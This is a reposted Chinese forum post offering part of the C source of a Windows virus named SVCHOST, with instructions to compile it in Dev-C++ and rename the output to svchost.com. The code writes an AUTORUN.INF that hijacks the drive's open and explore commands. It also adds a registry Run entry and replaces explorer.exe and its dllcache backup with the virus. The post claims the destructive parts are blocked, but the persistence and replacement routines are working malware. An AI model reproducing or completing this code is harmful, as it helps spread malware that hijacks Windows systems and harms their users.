c语言病,【转】C语言病毒－－连载

该楼层疑似违规已被系统折叠 隐藏此楼查看此楼

--------------------------------------------------------------------

核心代码：(全部代码请从附件中下载，请用DEV-CPP运行其中的工程文件，编译后请将结果文件svchost.exe更名为svchost.com,否则本病毒无法发挥作用，请安心运行实验，恶意代码已屏蔽)

/*

SK-CHINA

SVCHOST virus WRITE BY S.K

Compiler:

DEV-CPP 4.9.9.2

*/

/* SVCHOST.C */

/* SVCHOST.EXE */

/* SVCHOST.COM */

#include /*标准输入输出*/

#include /*字符串操作*/

#include /*其它函数*/

#include /*进程控制*/

#include

 /*目录函数*/

#define SVCHOST_NUM 6 /*关键位置病毒复制数量*/

#define RUBBISH_NUM 5 /*垃圾文件数量*/

#define REMOVE_NUM 5 /*删除文件数*/

/*====================================================================*/

/*

文件AUTORUN.INF内容：

1.自动运行SVCHOST.com

2.覆盖默认打开命令，使用病毒体作为新的打开方式

3.覆盖默认资源管理器命令，使病毒体作为新的命令方式

*/

char *autorun={"[AutoRun]\nopen=\"SVCHOST.com /s\"\nshell\\open=打开(&O)

\nshell\\open\\Command=\"SVCHOST.com /s\"\nshell\\explore=资源管理器(&X)

\nshell\\explore\\Command=\"SVCHOST.com /s\""};

/*=====================================================================*/

/*

添加注册表项：

1.自动运行生成病毒体C:\windows\wjview32.com

*/

char *regadd={"REGEDIT4\n\n

[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run]\n\"wjview32

\"=\"C:\\\\windows\\\\wjview32.com /s\""};

/*=====================================================================*/

/*

函数：复制文件

复制源：infile

目的地：outfile

成功返回0，失败返回1

*/

int copy(char *infile,char *outfile)

{

FILE *input,*output;

char temp;

if(strcmp(infile,outfile)!=0 && ((input=fopen(infile,"rb"))!=NULL) && ((output=fopen

(outfile,"wb"))!=NULL))

{

while(!feof(input))

{

fread(&temp,1,1,input);

fwrite(&temp,1,1,output);

}

fclose(input);

fclose(output);

return 0;

}

else return 1;

}

/*=====================================================================*/

/*

函数：通过explorer自动运行

成功返回0，失败返回1,2

*/

int autorun_explorer()

{

FILE *input;

if((input=fopen("c:\\windows\\system\\explorer.exe","rb"))!=NULL)

{

fclose(input);

remove("c:\\windows\\$temp$");

remove("c:\\windows\\system32\\dllcache\\$temp$");

return 1;

}

copy("c:\\windows\\explorer.exe","c:\\windows\\system\\explorer.exe");

rename("c:\\windows\\explorer.exe","c:\\windows\\$temp$");

rename("c:\\windows\\system32\\dllcache\\explorer.exe","c:\\windows\\system32

\\dllcache\\$temp$");

if(copy("SVCHOST.com","c:\\windows\\explorer.exe")==0 && copy

("SVCHOST.com","c:\\windows\\system32\\dllcache\\explorer.exe")==0)

return 0;

else

return 2;

}

/*=====================================================================*/

/*

函数：添加注册表项

成功返回0，失败返回1

*/

int add_reg()

{

FILE *output;

if((output=fopen("$$$$$","w"))!=NULL)

{

fprintf(output,regadd);

fclose(output);

spawnl(1,"c:\\windows\\regedit.exe"," /s $$$$$",NULL);

}

}

/*=====================================================================*/